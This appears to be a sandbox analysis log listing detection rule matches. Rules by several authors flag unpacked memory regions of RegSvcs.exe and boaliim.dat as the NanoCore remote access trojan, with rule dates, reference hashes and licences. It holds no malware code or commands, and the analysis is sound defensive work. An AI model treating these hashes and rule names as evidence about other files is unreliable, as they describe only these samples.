Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
